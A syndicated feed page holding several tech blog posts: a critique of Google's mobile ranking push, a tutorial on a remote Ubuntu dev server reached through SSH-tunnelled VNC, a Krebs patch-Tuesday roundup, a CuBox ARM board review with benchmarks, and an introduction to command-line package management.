Of course, there are two big problems with this code. First, it has so many conditions that it is likely to have multiple false-positives (e.g., detecting a tablet or even a desktop as a mobile phone). In fact, we can see this problem since the regular expression contains “kindle” — the Amazon Kindle is a tablet and not a smartphone. (And the Kindle user-agent string also includes the word ‘Android’ and may include the word ‘Mobile’.)

Second, this long chunk of code is a regular expression — a language describing a pattern to match. Regular expressions are comparatively slow to evaluate, and the more complicated the expression, the longer it takes. Unless you have unlimited resources (like Google) or have low web volume, then you probably do not want to run this code on every web page request.

If Google really wants to have every web site provide mobile-specific content, then perhaps they should push through a standard HTTP header for declaring a mobile device, tablet, and other types of devices. Right now, Google is forcing web sites to redesign for devices that they may not be able to detect.

(Of course, none of this handles the case where an anonymizer changes the user-agent setting, or where users change the user-agent value in their browser.)

Low Ranking Advice

Some of Google’s mobile site suggestions are good, but not limited to mobile devices. Enabling server compression and designing pages for fast loading benefit both desktop and mobile browsers.

I actually think that there may be a hidden motivation behind Google’s desire to force web site redesigns… The recommended layout — with large primary text, viewport window, and single column layout — is probably easier for Google to parse and index. In other words, Google wants every site to look the same so it will be easier for Google to index the content.

And then there is the entire anti-competitive edge. Google’s suggestion for detecting mobile devices (look for ‘Android’) excludes non-android devices like Apple’s iPhone. Looking for ‘Mobile’ misclassifies Apple’s iPad, potentially leading to a lesser user experience on Apple products. And Google wants you to make site changes so that your web pages work better with Googlebot. This effectively turns all web sites into Google-specific web sites.

Promoting aesthetics over content seems to go against the purpose of a search engine; users search for content and not styling. Normalizing content layout contradicts the purpose of having configurable layouts. Giving developers less than two months to make major changes seems out of touch with reality. And requiring design choices that favor the dominant company’s strict views seems very anti-competitive to me.

Many web sites depend on search engines like Google for income — either directly through ads or indirectly through visibility. This recent change at Google will dramatically impact many web sites — sites with solid content but, according to Google, less desirable layouts. Moreover, it forces companies to comply with Google’s requirements or lose future revenue.

Google has a long history of questionable behavior. This includes multiple lawsuits against Google for anti-competitive behavior and privacy violations. However, each of these cases are debatable. In contrast, I think that this requirement for site layout compliance is the first time that the “do no evil” company has explicitly gone evil in a non-debatable way.

Linux How-Tos and Linux Tutorials: How to Configure Your Dev Machine to Work From Anywhere (Part 3)

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jeff Cogswell. Original post: at Linux How-Tos and Linux Tutorials

In the previous articles, I talked about my mobile setup and how I’m able to continue working on the go. In this final installment, I’ll talk about how to install and configure the software I’m using. Most of what I’m talking about here is on the server side, because the Android and iPhone apps are pretty straightforward to configure.

Before we begin, however, I want to mention that the setup I’ve been describing really isn’t for production machines. It should be limited to development and test machines. Also, there are many different ways to work remotely, and this is only one possibility. In general, you really can’t beat a good command-line tool and SSH access. But in some cases, that didn’t really work for me. I needed more; I needed a full Chrome JavaScript debugger, and I needed better word processing than was available on my Android tablets.

Here, then, is how I configured the software. Note, however, that I’m not writing this as a complete tutorial, simply because that would take too much space. Instead, I’m providing overviews, and assuming you know the basics and can google to find the details. We’ll take this step by step.

Spin up your server

First, we spin up the server on a host. There are several hosting companies; I’ve used Amazon Web Services, Rackspace, and DigitalOcean. My own personal preference for the operating system is Ubuntu Linux with LXDE. LXDE is a full desktop environment that includes the OpenBox window manager. I personally like OpenBox because of its simplicity while maintaining visual appeal. And LXDE is nice because, as its name suggests (Lightweight X11 Desktop Environment), it’s lightweight. However, many different environments and window managers will work. (I tried a couple tiling window managers such as i3, and those worked pretty well too.)

The usual order of installation goes like this: You use the hosting company’s website to spin up the server, and you provide a key file that will be used for logging into the server. You can usually use your own key that you generate, or have the service generate a key for you, in which case you download the key and save it. Typically when you provide a key, the server will automatically be configured to allow logins only over SSH with the key file. However, if not, you’ll want to disable password logins yourself.
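If you'd rather generate the key pair yourself and hand the public half to the hosting provider, something like this works (the file name and comment are arbitrary):

ssh-keygen -t rsa -b 4096 -f ~/.ssh/devserver -C "hosted dev machine"
# upload ~/.ssh/devserver.pub when creating the server; the private half stays on your own devices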

Connect to the server

The next step is to actually log into the server through an SSH command line and first set up a user for yourself that isn’t root, and then set up the desktop environment. You can log in from your desktop Linux, but if you like, this is a good chance to try out logging in from an Android or iOS tablet. I use JuiceSSH; a lot of people like ConnectBot. And there are others. But whichever you get, make sure it allows you to log in using a key file. (Key files can be created with or without a password. Also make sure the app you use allows you to use whichever key file type you created–password or no password.)

Copy your key file to your tablet. The best way is to connect the tablet to your computer, and transfer the file. However, if you want a quick and easy way to do it, you can email it. But be aware that you’re sending the private key file through an email system that other people could potentially access. It’s your call whether you want to do that. Either way, get the file installed on the tablet, and then configure the SSH app to log in using the key file, using the app’s instructions.

Then using the app, connect to your server. You’ll need the username, even though you’re using a key file (the server needs to know who you’re logging in as with the key file, after all); AWS typically uses “ubuntu” for the username for Ubuntu installations; others simply give you the root user. For AWS, to do the installation you’ll need to type sudo before each command since you’re not logged in as root, but won’t be asked for a password when running sudo. On other cloud hosts you can run the commands without sudo since you’re logged in as root.
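As a rough sketch of that first-login housekeeping on an Ubuntu image (the user name is just an example; drop the sudo if your host logged you in as root):

sudo adduser jeff               # create a regular, non-root account
sudo usermod -aG sudo jeff      # allow that account to use sudo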

Oh and by the way, because we don’t yet have a desktop environment, you’ll be typing commands to install the software. If you’re not familiar with the package installation tools, now is a chance to learn about them. For Debian-based systems (including Ubuntu), you’ll use apt-get. Other systems use yum, which is a command-line interface to the RPM package manager.
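In practice the two families look like this (the package name is a placeholder):

sudo apt-get update && sudo apt-get install some-package    # Debian, Ubuntu and derivatives
sudo yum install some-package                               # RPM-based distributions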

Install LXDE

From the command-line, it’s time to set up LXDE, or whichever desktop you prefer. One thing to bear in mind is that while you can run something big like Cinnamon, ask yourself if you really need it. Cinnamon is big and cumbersome. I use it on my desktop, but not on my hosted servers, opting instead for more lightweight desktops like LXDE. And if you’re familiar with desktops such as Cinnamon, LXDE will feel very similar.

There are lots of instructions online for installing LXDE or other desktops, and so I won’t reiterate the details here. DigitalOcean has a fantastic blog with instructions for installing a similar desktop, XFCE.
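On Ubuntu the short version is a single install (a minimal sketch; the lxde metapackage pulls in OpenBox and the rest of the desktop):

sudo apt-get update
sudo apt-get install lxde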

Install a VNC server

Then you need to install a VNC server. Instead of using TightVNC, which a lot of people suggest, I recommend vnc4server because it allows for easy resolution changes, as I’ll describe shortly.
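Installing it and doing a first manual run looks something like this (the first run prompts you to set the VNC password mentioned in the next paragraph and creates the ~/.vnc directory):

sudo apt-get install vnc4server
vnc4server :1          # first run: set the VNC password
vnc4server -kill :1    # stop it again; the init script later in this article will manage it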

While setting up the VNC server, you’ll create a VNC username. You can just use a username and password for VNC, and from there you’re able to connect from a VNC client app to the system. However, the connection won’t be secure. Instead, you’ll want to connect through what’s called an SSH tunnel. The SSH tunnel is basically an SSH session into the server that is used for passing connections that would otherwise go directly over the internet.

When you connect to a server over the Internet, you use a protocol and a port. VNC usually uses 5900 or 5901 for the port. But with an SSH tunnel, the SSH app listens on a port on the same local device, such as 5900 or 5901. Then the VNC app, instead of connecting to the remote server, connects locally to the SSH app. The SSH app, in turn, passes all the data on to the remote system. So the SSH serves as a go-between. But because it’s SSH, all the data is secure.

So the key is setting up a tunnel on your tablet. Some VNC apps can create the tunnel; others can’t and you need to use a separate app. JuiceSSH can create a tunnel, which you can use from other apps. My preferred VNC app, Remotix, on the other hand, can do the tunnel itself for you. It’s your choice how you do it, but you’ll want to set it up.

The app will have instructions for the tunnel. In the case of JuiceSSH, you specify the server you’re connecting to and the port, such as 5900 or 5901. Then you also specify the local port number the tunnel will be listening on. You can use any available port, but I’ll usually use the same port as the remote one. If I’m connecting to 5901 on the remote, I’ll have JuiceSSH also listen on 5901. That makes it easier to keep straight. Then you’ll open up your VNC app, and instead of connecting to a remote server, you connect to the port on the same tablet. For the server you just use 127.0.0.1, which is the IP address of the device itself. So to re-iterate:

  1. JuiceSSH connects, for example, to 5901 on the remote host. Meanwhile, it opens up 5901 on the local device.
  2. The VNC app connects to 5901 on the local device. It doesn’t need to know anything about what remote server it’s connecting to.
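For comparison, the same tunnel from a desktop Linux machine is a single ssh invocation (host name, user name and key path are placeholders):

ssh -i ~/.ssh/devserver -N -L 5901:127.0.0.1:5901 ubuntu@dev.example.com
# while this runs, point the VNC client at 127.0.0.1:5901 on the local machine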

But some VNC apps don’t need another app to do the tunneling, and instead provide the tunnel themselves. Remotix can do this; if you set up your app to do so, make sure you understand that you’re still tunneling. You provide the information needed for the SSH tunnel, including the key file and username. Then Remotix does the rest for you.

Once you get the VNC app going, you’ll be in. You should see a desktop open with the LXDE logo in the background. Next, you’ll want to go ahead and configure the VNC client to your liking; I prefer to control the mouse using drags that simulate a trackpad; other people like to control the mouse by tapping exactly where you want to click. Remotix and several other apps let you choose either configuration.

Configuring the Desktop

Now let’s configure the desktop. One issue I had was getting the desktop to look good on my 10-inch tablet. This involved configuring the look and feel by clicking the taskbar menu > Preferences > Customize Look and Feel (or running lxappearance from the command line).


I also used OpenBox’s own configuration tool by clicking the taskbar menu > Preferences > OpenBox Configuration Manager (or running obconf).


My larger tablet’s screen isn’t huge at 10 inches, so I configured the menu bars and buttons and such to be somewhat large for a comfortable view. One issue is the tablet has such a high resolution that if I used the maximum resolution, everything was tiny. As such, I needed to be able to change resolutions based on the work I was doing, as well as based on which tablet I was using. This involved configuring the VNC server, though, not LXDE and OpenBox. So let’s look at that.

In order to change resolution on the fly, you need a program that can manage the RandR extensions, such as xrandr. But TightVNC, the server that many people seem to use, doesn’t work with RandR. Instead, I found that the vnc4server program works with xrandr, which is why I recommend using it instead. When you configure vnc4server, you’ll want to provide the different resolutions in the command’s -geometry option. Here’s an init.d service configuration file that does just that. (I modified this based on one I found on DigitalOcean’s blog.)

#!/bin/bash
PATH="$PATH:/usr/bin/"
export USER="jeff"
DISPLAY="1"
OPTIONS="-depth 16 -geometry 1920x1125 -geometry 1240x1920 -geometry 2560x1500 -geometry 1920x1080 -geometry 1774x1040 -geometry 1440x843 -geometry 1280x1120 -geometry 1280x1024 -geometry 1280x750 -geometry 1200x1100 -geometry 1024x768 -geometry 800x600 :${DISPLAY}"
. /lib/lsb/init-functions
case "$1" in
start)
log_action_begin_msg "Starting vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vnc4server ${OPTIONS}"
;;
stop)
log_action_begin_msg "Stopping vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vnc4server -kill :${DISPLAY}"
;;
restart)
$0 stop
$0 start
;;
esac
exit 0

The key here is the OPTIONS line with all the -geometry options. These are the resolutions that will show up when you run xrandr from the command line.

You can use your VNC login to modify the file in the init.d directory (and indeed I did, using the editor called scite). But then after making these changes, you’ll need to restart the VNC service just this one time, since you’re changing its service settings. Doing so will end your current VNC session, and it might not restart correctly. So you might need to log in through JuiceSSH to restart the VNC server. Then you can log back in with the VNC server. (You also might need to restart the SSH tunnel.) After you do, you’ll be able to configure the resolution. And from then on, you can change the resolution on the fly without restarting the VNC server.
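Assuming you saved the script above as /etc/init.d/vncserver (the name is up to you), the one-time restart from the JuiceSSH session is:

sudo service vncserver restart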

To change resolutions without having to restart the VNC server, just type:

xrandr -s 1

Replace 1 with the number of the resolution you want.

Server Concerns

After everything is configured, you’re free to use the software you’re familiar with. The only catch is that hosts charge a good bit for servers that have plenty of RAM and disk space. As such, you might be limited in what you can run based on the amount of RAM and cores. Still, I’ve found that with just 2GB of RAM and 2 cores, with Ubuntu and LXDE, I’m able to have Chrome open with a few pages, LibreOffice with a couple of documents open, Geany for my code editing, my own server software running under node.js for testing, and a MySQL server. Occasionally if I get too many Chrome tabs open, the system will suddenly slow way down and I have to shut down tabs to free up more memory. Sometimes I run MySQL Workbench and it can bog things down a bit too, but it isn’t bad if I close up LibreOffice and leave only one or two Chrome tabs open. But in general, for most of my work, I have no problems at all.

And on top of that, if I do need more horsepower, I can spin up a bigger server with 4GB or 8GB and four cores or eight cores. But that gets costly and so I don’t do it for too many hours.

Multiple Screens

For fun, I did manage to get two screens going on a single desktop, one on my bigger 10-inch ASUS transformer tablet, and one on my smaller Nexus 7 all from my Linux server running on a public cloud host, complete with a single mouse moving between the two screens. To accomplish this, I started two VNC sessions, one from each tablet, and then from the one with the mouse and keyboard, I ran:

x2x -east -to :1

This basically connected the single mouse and keyboard to both displays. It was a fun experiment, but in my case provided little practical value because it wasn’t like a true dual-display setup on a desktop computer. I couldn’t move windows between the displays, and the Chrome browser won’t open under more than one X display. In my case, for web development, I wanted to be able to open up the Chrome browser on one tablet, and then the Chrome JavaScript debug window on the other, but that didn’t work out.

Instead, what I found more useful was to have an SSH command-line shell on the smaller tablet, and that’s where I would run my node.js server code, which was printing out debug information. Then on the other I would have the browser running. That way I can glance back and forth without switching between windows on the single VNC login on the bigger tablet.

Back to Security

I can't overstate the importance of making sure you have your security set up and that you understand how the security works and what the ramifications are. I highly recommend using SSH with keyfile logins only, with no password logins allowed. And treat this as a development or test machine; don't put customer data on it, since that could open you up to lawsuits in the event the machine gets compromised.
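As a minimal sketch, the relevant lines in /etc/ssh/sshd_config for key-only logins look like this (restart the SSH service afterwards; the exact service name varies a little between distros):

# /etc/ssh/sshd_config (excerpt)
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitRootLogin no

sudo service ssh restart    # the service is called 'sshd' rather than 'ssh' on some distros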

Instead, for production machines, allocate your production servers using all the best practices laid out by your own IT department security rules, and the host’s own rules. One issue I hit is my development machine needs to log into git, which requires a private key. My development machine is hosted, which means that private key is stored on a hosted server. That may or may not be a good idea in your case; you and your team will need to decide whether to do it. In my case, I decided I could afford the risk because the code I’m accessing is mostly open-source and there’s little private intellectual property involved. So if somebody broke into my development machine, they would have access to the source code for a small but non-vital project I’m working on, and drafts of these articles–no private or intellectual data.

Web Developers and A Pesky Thing Called Windows

Before I wrap this up, I want to present a topic for discussion. Over the past few years I’ve noticed that a lot of individual web developers use a setup quite similar to what I’m describing. In a lot of cases they use Windows instead of Linux, but the idea is the same regardless of operating system. But where they differ from what I’m describing is they host their entire customer websites and customer data on that one machine, and there is no tunneling; instead, they just type in a password. That is not what I’m advocating here. If you are doing this, please reconsider. (I personally know at least three private web developers who do this.)

Regardless of operating system, take some time to understand the ramifications here. First, by logging in with a full desktop environment, you're possibly slowing down your machine for your dev work. And if you mess something up and have to reboot, your clients' websites aren't available during that time. Are you using replication? Are you using private networking? Are you running MySQL or some other database on the same machine instead of using virtual private networking? Entire books could be (and have been) written on such topics and what the best practices are. Learn about replication; learn about virtual private networking and how to shield your database servers from outside traffic; and so on. And most importantly, consider the security issues. Are you hosting customer data in a site that could easily be compromised? That could spell L-A-W-S-U-I-T. And that brings me to my conclusion for this series.

Concluding Remarks

Some commenters on the previous articles have brought up some valid points; one even used the phrase “playing.” While I really am doing development work, I’m definitely not doing this on production machines. If I were, that would indeed be playing and not be a legitimate use for a production machine. Use SSH for the production machines, and pick an editor to use and learn it. (I like vim, personally.) And keep the customer data on a server that is accessible only from a virtual private network. Read this to learn more.

Learn how to set up and configure SSH. And if you don’t understand all this, then please, practice and learn it. There are a million web sites out there to teach this stuff, including linux.com. But if you do understand and can minimize the risk, then, you really can get some work done from nearly anywhere. My work has become far more productive. If I want to run to a coffee shop and do some work, I can, without having to take a laptop along. Times are good! Learn the rules, follow the best practices, and be productive.

See the previous tutorials:

How to Set Up Your Linux Dev Station to Work From Anywhere

Choosing Software to Work Remotely from Your Linux Dev Station

Darknet - The Darkside: Google Chrome 42 Stomps A LOT Of Bugs & Disables Java By Default

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

Ah finally, the end of NPAPI is coming. A relic from the Netscape era, the Netscape Plugin API causes a lot of instability and security issues in Chrome. It means Java is now disabled by default, along with other NPAPI-based plugins, in Google Chrome 42. Chrome will be removing support for NPAPI totally […]

The post Google Chrome 42 Stomps…

Read the full post at darknet.org.uk

Krebs on Security: Critical Updates for Windows, Flash, Java

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Get your patch chops on people, because chances are you’re running software from Microsoft, Adobe or Oracle that received critical security updates today. Adobe released a Flash Player update to fix at least 22 flaws, including one flaw that is being actively exploited. Microsoft pushed out 11 update bundles to fix more than two dozen bugs in Windows and associated software, including one that was publicly disclosed this month. And Oracle has an update for its Java software that addresses at least 15 flaws, all of which are exploitable remotely without any authentication.

Adobe's patch includes a fix for a zero-day bug (CVE-2015-3043) that the company warns is already being exploited. Users of the Adobe Flash Player for Windows and Macintosh should update to Adobe Flash Player 17.0.0.169 (the current versions for other OSes are listed in the chart below).

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to version 17.0.0.169.

Google has an update available for Chrome that fixes a slew of flaws, and I assume it includes this Flash update, although the Flash checker pages only report that I now have version 17.0.0 installed after applying the Chrome update and restarting (the Flash update released last month put that version at 17.0.0.134, so this is not particularly helpful). To force the installation of an available update, click the triple bar icon to the right of the address bar, select "About Google Chrome," click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware of potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera).

Microsoft has released 11 security bulletins this month, four of which are marked "critical," meaning attackers or malware can exploit them to break into vulnerable systems with no help from users, save for perhaps visiting a booby-trapped or malicious Web site. The Microsoft patches fix flaws in Windows, Internet Explorer (IE), Office, and .NET.

The critical updates apply to two Windows bugs, IE, and Office. .NET updates have a history of taking forever to apply and introducing issues when applied with other patches, so I’d suggest Windows users apply all other updates, restart and then install the .NET update (if available for your system).

Oracle's quarterly "critical patch update" plugs 15 security holes. If you have Java installed, please update it as soon as possible. Windows users can check for the program in the Add/Remove Programs listing in Windows, or visit Java.com and click the "Do I have Java?" link on the homepage. Updates also should be available via the Java Control Panel or from Java.com.

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. In the past, updating via the control panel auto-selected the installation of third-party software, so be sure to look for any pre-checked “add-ons” before proceeding with an update through the Java control panel. Also, Java 7 users should note that Oracle has ended support for Java 7 after this update. The company has been quietly migrating Java 7 users to Java 8, but if this hasn’t happened for you yet and you really need Java installed in the browser, grab a copy of Java 8. The recommended version is Java 8 Update 40.

Otherwise, seriously consider removing Java altogether. I have long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, there is a way to have this program installed while minimizing the chance that crooks will exploit unknown or unpatched flaws in the program: unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play, which can block Web sites from displaying both Java and Flash content by default). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

Many people confuse Java with JavaScript, a powerful scripting language that helps make sites interactive. Unfortunately, a huge percentage of Web-based attacks use JavaScript tricks to foist malicious software and exploits onto site visitors. For more about ways to manage JavaScript in the browser, check out my tutorial Tools for a Safer PC.

Linux How-Tos and Linux Tutorials: The CuBox: Linux on ARM in Around 2 Inches Cubed

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

The CuBox is a 2-inch cubed ARM machine that can be used as a set-top box, a small NAS or database server, or in many other interesting applications. In my ongoing comparison of ARM machines, including the BeagleBone Black, Cubieboard, and others, the CuBox has the fastest IO performance for SSD that I've tested so far.

There are a few models, and some ways to customize each model, giving you the choice between dual or quad cores, 1 or 2 gigabytes of RAM, 100 megabit or gigabit ethernet, and whether you want wifi and bluetooth. This gives you a price range from $90 to $140 depending on which features you're after. We'll take a look at the CuBox i4Pro, which is the top-of-the-line model with all the bells and whistles.

CuBox Features

Most of the connectors on the CuBox are on the back side. The connectors include gigabit ethernet, two USB 2.0 ports, a full sized HDMI connector, eSATA, power input, and a microSD slot. Another side of the CuBox also features an Optical S/PDIF Audio Out. The power supply is a 5 Volt/3 Amp unit and connects using a DC jack input on the CuBox.

One of the first things I noticed when unpacking the CuBox is that it is small, coming in at 2 by 2 inches in length and width and around 1 and 3/4 inches tall. To contrast, a Raspberry Pi 2 in a case comes out at around 3.5 inches long and just under but close to 2.5 inches wide. The CuBox stands taller on the table than the Raspberry Pi.

When buying the CuBox you can choose to get either Android 4.4 or OpenELEC/XBMC on your microSD card. You can also install Debian, Fedora, openSUSE, and others, when it arrives.

The CuBox i4Pro had Android 4.4.2 pre-installed. The first boot up sat at the “Android” screen for minutes, making me a little concerned that something was amiss. After the delay you are prompted to select the app launcher that you want to use and then you’re in business. A look at the apps that are available by default shows Google Keep and Drive as well as the more expected apps like Youtube, Gmail, and the Play Store. The YouTube app was recent enough to include an option to Chromecast the video playback. Some versions of Android distributed with small ARM machines do not come with the Play Store by default, so it’s good to see it here right off the bat.

One app that I didn’t expect was the Ethernet app. This lets you check what IP address, DNS settings, and proxy server, if any, are in use at the moment. You can also specify to use DHCP (the default) or a static IP address and nominate a proxy server as well as a list of machines that the CuBox shouldn’t use the proxy to access.

When switching applications the graphical transitions were smooth. The mouse wheel worked as expected in the App/Widgets screen, the settings menu, and the YouTube app. The Volume +/- keys on a multimedia keyboard changed the volume, but only jumped between fully on and fully off. That might not be an issue if you are controlling the volume with your television or amp instead of the CuBox. Playback in the YouTube app was smooth and transitioned to full screen playback without any issues.

The Chrome browser (version 31.0.1650.59) got 2,445 overall for the Octane 2.0 benchmark. To contrast, on a 3-year-old Mac Air, Chrome (version 41.0.2272.89) got 13,542 overall.

Installing Debian

The microSD slot in the CuBox is not spring loaded, so to remove the microSD card you have to use your fingernail to carefully prise it out of the slot.

Switching to Debian can be done by downloading the image and using a command like the one below to copy that image to a microSD card. I kept the original card and used a new, second microSD card to write Debian onto so I could easily switch between Debian and Android. Once writing is done, slowly prise out the original microSD card and insert the newly created Debian microSD card.

dd if=Cubox-i_Debian_2.6_wheezy_3.14.14.raw \
   of=/dev/disk/by-id/this-is-where-my-microsdcard-is-at \
   bs=1048576
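One note of caution worth a couple of extra commands: make absolutely sure the of= path points at the microSD card and not one of your other disks, and flush the buffers before pulling the card out. The device paths here are placeholders for whatever your system shows:

lsblk                     # list block devices and their sizes
ls -l /dev/disk/by-id/    # the stable by-id names make it harder to pick the wrong disk
sync                      # after dd finishes, flush buffers before removing the card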

There is also support for installing and running a desktop on your CuBox/Debian setup. That extends to experimental support for accelerated GPU and VPU on the CuBox. On my Debian installation I tried to hardware decode the Big Buck Bunny video, but it seems some more tinkering is needed to get hardware decoding working. Using the "GeexBox XBMC - A Kodi Media Center" version 3.1 distribution, the Big Buck Bunny file played fine, so hardware decoding is supported by the CuBox; it just might take a little more tinkering to get at it if you want to run Debian.

The Debian image boots to a text console by default. This is easily overcome by installing a desktop environment; I found that Xfce worked well on the CuBox.
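On the Debian image that amounts to roughly the following. This is just a sketch: xfce4 and lightdm are the standard Debian package names, and lightdm is only one of several display-manager choices:

sudo apt-get update
sudo apt-get install xfce4 lightdm    # desktop environment plus a graphical login manager
sudo reboot                           # come back up at the graphical login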

CuBox Performance

Digging around in /sys one should find the directory /sys/devices/system/cpu/cpu0/cpufreq, which contains interesting files like cpuinfo_cur_freq and cpuinfo_max_freq. For me these showed about 0.8 GHz and 1.2 GHz respectively.
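Those files can be read directly; the kernel reports the values in kHz, so 1200000 corresponds to 1.2 GHz:

cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq    # current frequency, in kHz
cat /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq    # maximum frequency, in kHz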

The OpenSSL benchmark is a single core test. Some other ARM machines like the ODroid-XU are clocked much faster than the CuBox, which will have an impact on the OpenSSL benchmark.

Compiling OpenSSL 1.0.1e on four cores took around 6.5 minutes. Performance for digests and ciphers was in a similar ballpark to the BeagleBone Black. For 1,024-bit RSA signatures the CuBox beat the BeagleBone Black, at roughly 200 versus 160 signatures per second.
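The numbers come from the standard OpenSSL speed benchmark, presumably invoked along these lines (exact algorithm names vary slightly between OpenSSL versions):

openssl speed sha256 aes rsa1024    # single-core run of digests, ciphers, and 1,024-bit RSA
openssl speed -multi 4 rsa1024      # optionally spread the RSA test across all four cores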

[Charts: CuBox cipher, digest, and RSA signing benchmark results]

Iceweasel 31.5 gets an Octane score of 2,015. For comparison, Iceweasel 31.4.0esr-1 on the Raspberry Pi 2 got an overall Octane score of 1,316.

To test 2D graphics performance I used version 1.0.1 of the Cairo Performance Demos. The gears test runs three turning gears; the chart test runs four line graphs; fish is a simulated fish tank with many fish swimming around; gradient is a filled, curved-edged path that moves around the screen; and flowers renders rotating flowers that move up and down the screen. For comparison I used a desktop machine running an Intel 2600K CPU with an NVidia GTX 570 card driving two screens, one at 2560 x 1440 and the other at 1080p.

Test        Radxa at 1080   BeagleBone Black at 720   Mars LVDS at 768   Desktop 2600K/NV570 (two screens)   Raspberry Pi 2 at 1080   CuBox i4Pro at 1080
gears       29              26                        18                 140                                 21.5                     15.25
chart       3               2                         2                  16                                  1.7                      3.1
fish        3               4                         0.3                188                                 1.6                      2
gradient    12              10                        17                 117                                 9.6                      9.7

eSATA

The CuBox also features an eSATA port, freeing you from microSD cards by making the considerably faster SSD storage available. The eSATA port, multi cores, and gigabit ethernet port make the CuBox and an external 2.5-inch SSD an interesting choice for a small NAS.

I connected a 120 GB SanDisk Extreme SSD to test the eSATA performance. For sequential IO, Bonnie++ could write about 120 MB/s, read about 150 MB/s, and rewrite blocks at about 50 MB/s. It also managed around 6,000 seeks per second.
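A typical Bonnie++ invocation against a mounted SSD looks something like the following; the device node, mount point, and user name are placeholders for whatever your setup uses:

sudo mount /dev/sda1 /mnt/ssd      # mount the eSATA SSD somewhere convenient
bonnie++ -d /mnt/ssd -u debian     # -d is the test directory; -u is required if you run it as root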

For price comparison, a 120 GB SanDisk SSD currently goes for about $70 while a 128 GB SanDisk microSD card is around $100. The microSD card packaging mentions transfer rates of up to 48 MB/s. And that's before considering that the SSD should perform better for server loads and for workloads with frequent rewrites, such as database servers.

For comparison, this is the same SSD I used when reviewing the Cubieboard. Although the CuBox and Cubieboard have similar-sounding names, they are completely different machines. Back then I found that the Cubieboard could write about 41 MB/s and read back 104 MB/s, with 1,849 seeks/s performed. The same SSD on the TI OMAP5432 got 66 MB/s write and 131 MB/s read, and could do 8,558 seeks/s. It is strange that the CuBox can transfer more data to and from the drive than the TI OMAP5432, yet the OMAP5432 has better seek performance.

As far as eSATA data transfer goes, the CuBox is the ARM machine with the fastest IO performance for this SSD I have tested so far.

Power usage

At an idle graphical login with a mouse and keyboard plugged in, the CuBox drew 3.2 Watts. Disconnecting the keyboard and mouse dropped power to 2.8 W. With the keyboard and mouse reconnected for the remainder of the readings, running a single instance of OpenSSL speed pushed that to 4 W, and running four OpenSSL speed tests at once brought it up to 6.3 W. When running Octane the power occasionally ranged up to 5 W.

Final Words

While the smallest ARM machines try to attach directly to an HDMI port, once you add a realistic number of connections, such as power, ethernet, and some USB cables, the HDMI dongle form factor becomes a disadvantage. Instead, the CuBox opts to have (almost) all the connectors coming out of one side of the machine and to make that machine extremely small.

Being able to select from three base machines, and configure if you want (and want to pay for) wifi and bluetooth lets you customize the machine for the application you have in mind. The availability of eSATA and a gigabit ethernet connection allow the CuBox to be a small server — be that a NAS or a database server. The availability of two XBMC/Kodi disk images offering hardware video decoding also makes the CuBox an interesting choice for media playback.

We would like to thank SolidRun for supplying the CuBox hardware used in this review.

Linux How-Tos and Linux Tutorials: How to Use the Linux Command Line: Software Management

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials


In the previous article of this series we learned some of the basics of the CLI (command line interface). In this article, we will learn how to manage software on your distro using only the command line, without touching the GUI at all.

I see great benefits in using the command line on any Ubuntu-based system. Each *buntu comes with its own 'custom' software management tool, which creates inconsistent experiences across different flavors even though they use the same repositories and resources to manage software. The life of a user becomes easier with the CLI because the same command works across flavors and derivatives. So if you are a Kubuntu user you won't have a problem supporting a Linux Mint user, because the CLI removes all the confusing wrappers. In this tutorial I am targeting all major distros: Debian/Ubuntu, openSUSE and Fedora.

Debian/Ubuntu: How to update repositories and install packages

There are two command line tools for the Debian family: 'apt-get' and 'aptitude'. Aptitude is considered the superior tool as it does a better job of resolving dependencies and managing packages. If your Ubuntu system doesn't come with 'aptitude' pre-installed, I suggest you install it.

Before we install any package we must always update the repositories so that they can pull the latest information about the packages. This is not limited to Ubuntu. Irrespective of the distro you use, you must always update the repositories before installing packages or running system updates. The command to update the repositories is:

sudo apt-get update

Once the repositories are updated you can install 'aptitude'. The pattern is simple: sudo apt-get install [package-name]. For example:

sudo apt-get install aptitude

Ubuntu comes pre-installed with a bash-completion tool which makes life even easier with apt-get and aptitude. You don’t have to remember the complete name of the package, just type the first three letters and hit ‘Tab’ key. Bash will offer you all the packages starting with those three letters. So if I type ‘sudo apt-get install apt’ and then hit ‘Tab’ it will show me a long list of such packages.

Once aptitude is installed, you should start using it instead of apt-get. The usage is the same; just replace apt-get with aptitude.

Run system update/upgrades

Running a system upgrade is quite easy on Ubuntu and its derivatives. The command is simple:

sudo aptitude update
sudo aptitude upgrade

There is another command for system upgrades called 'dist-upgrade'. This command is a bit more advanced than the simple 'upgrade' command because it performs some extra tasks. The 'upgrade' command only upgrades the installed packages to their newest versions and never removes anything. 'Dist-upgrade', on the other hand, also handles dependency changes and may remove packages that are no longer needed. Also, if you want to upgrade the Linux kernel to the latest version, you need the 'dist-upgrade' command. You can run the following commands:

sudo aptitude update
sudo aptitude dist-upgrade

